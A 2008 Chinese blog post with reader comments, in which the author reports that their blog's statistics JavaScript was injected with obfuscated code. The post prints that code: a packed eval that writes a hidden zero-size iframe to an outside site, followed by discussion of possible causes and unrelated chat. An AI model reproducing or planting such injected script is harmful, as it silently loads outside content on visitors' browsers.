被挂马了
@我招谁惹谁了?
我的blog里每个页面都加在一个用于统计的JS文件。今天我访问自己blog时McAfee提示发现木马,我检查文件后发现上述JS里被加入了一大坨代码。据说还是用JS混淆器处理过的:
function ads(){var Then = new Date()
Then.setTime(Then.getTime() + 6*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){} else {document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<1 4=0 3=0 2="7://8.d/c/b.9?a">1>\');',14,14,'|iframe|src|width|height|document|writeln|http|mydeller|htm|feng|add_651435|page|cn'.split('|'),0,{}))
window.status=" ";}}ads();
我把JS保存到本地,用safari打开,用safari的web检查器检查,发现貌似只是一个刷流量的东西,调用了51.la的统计代码还有别的乱七八糟。。。
我也不知道怎么就被挂马了,是服务器被黑了呢还是我自己的原因?总之我已经修改了空间里几乎所有程序的密码,顺便把一些来路不正的源码删掉了。希望可以安全。
顺便。。。safari是个好东西,有了它就不要到处找什么FLV下载器了,在播放在线视频的时候按ctrl+alt+A(或者在菜单里选择窗口-活动)你会发现一个正在不断下载中的文件,双击之就能保存到本地了哦耶。
fin.
页面会变得很长么?期待。
Looki 2008-05-19,22:55 says: “回复”
可能是同服务或同机房有程序漏洞造成的吧
想当初F2blog有漏洞时,我的整个服务器控制权都被人得到了
唉,这个星期被地震给折腾坏了
dimlau 2008-05-19,23:05 says: “回复”
@looki 刚想问候你呢,电视上正在放着关于西安的新闻呢,不过既然你来了应该是没缺胳膊少腿吧
Looki 2008-05-19,23:14 says: “回复”
还好还好,就是没睡好觉而已
其实我除了5.12那次感觉到强烈的震外
后面的几次我都没感觉的-_-#
但是因为那些过份敏感的人们,搞得我也紧张了
dimlau 2008-05-19,23:34 says: “回复”
@looki 好吧,我认定我捐的钱都用来抚平你受伤的心了,呵呵
PS.好怀念版聊啊。。。
zorro 2008-05-20,00:04 says: “回复”
人家很多门户网都灰色了,你怎么也不处理呢?!!
dimlau 2008-05-20,00:38 says: “回复”
@zorro 我这里除了蓝色就是灰色了,还处理啥。。。
Jose 2008-05-20,00:45 says: “回复”
最后一段学习了~特此感谢!
leavic 2008-05-20,00:49 says: “回复”
99%是你自己的電腦中毒了,我也碰過這種病毒,別的反應都沒有,就是時不時的在你訪問網頁的時候插一段代碼進去。
dimlau 2008-05-20,00:58 says: “回复”
@leavic 好吧,我承认你给我的网址我看了,除了这个我已经很久没有访问不在我opera speed dial里的网站了。难道一次犯错就中标!我太惨了
wayne 2008-05-20,01:30 says: “回复”
把上面的banner也灰掉阿...
dimlau 2008-05-20,02:14 says: “回复”
@zorro&wayne 好吧,IE下已经灰了
leavic 2008-05-20,02:59 says: “回复”
@dimlau,
我早就把那個網站上的所有站外內容屏蔽了。。。
另外絕大部分的網頁木馬對opera和FF應該都是無效的,如果真是通過這種中毒,那恭喜你碰上小概率事件了。
dimlau 2008-05-20,10:29 says: “回复”
我去那里的时候也屏蔽了很多东西。昨天彻底杀了一遍毒,没发现什么异常,应该不是那个的原因
总之目前为止没有再出问题,但愿不会出事了
yacca 2008-05-20,22:45 says: “回复”
...服务器被黑了估计
dimlau 2008-05-21,00:20 says: “回复”
@yacca 貌似很多和我同空间上的网站也出现速度不稳定等等问题,可能真的被黑了
easylau 2008-05-21,23:41 says: “回复”
那这几天上不去也就是这个原因吧o(∩_∩)o...呵呵
dimlau 2008-05-22,00:27 says: “回复”
这几天速度一直不稳定,所以打不开页面可能是速度问题。
footprinter 2008-05-25,15:00 says: “回复”
人品体现出来了吧?
dimlau 2008-05-25,17:26 says: “回复”
@footprinter 你是说我发现及时并且清理迅速,所以人品很好?嘿嘿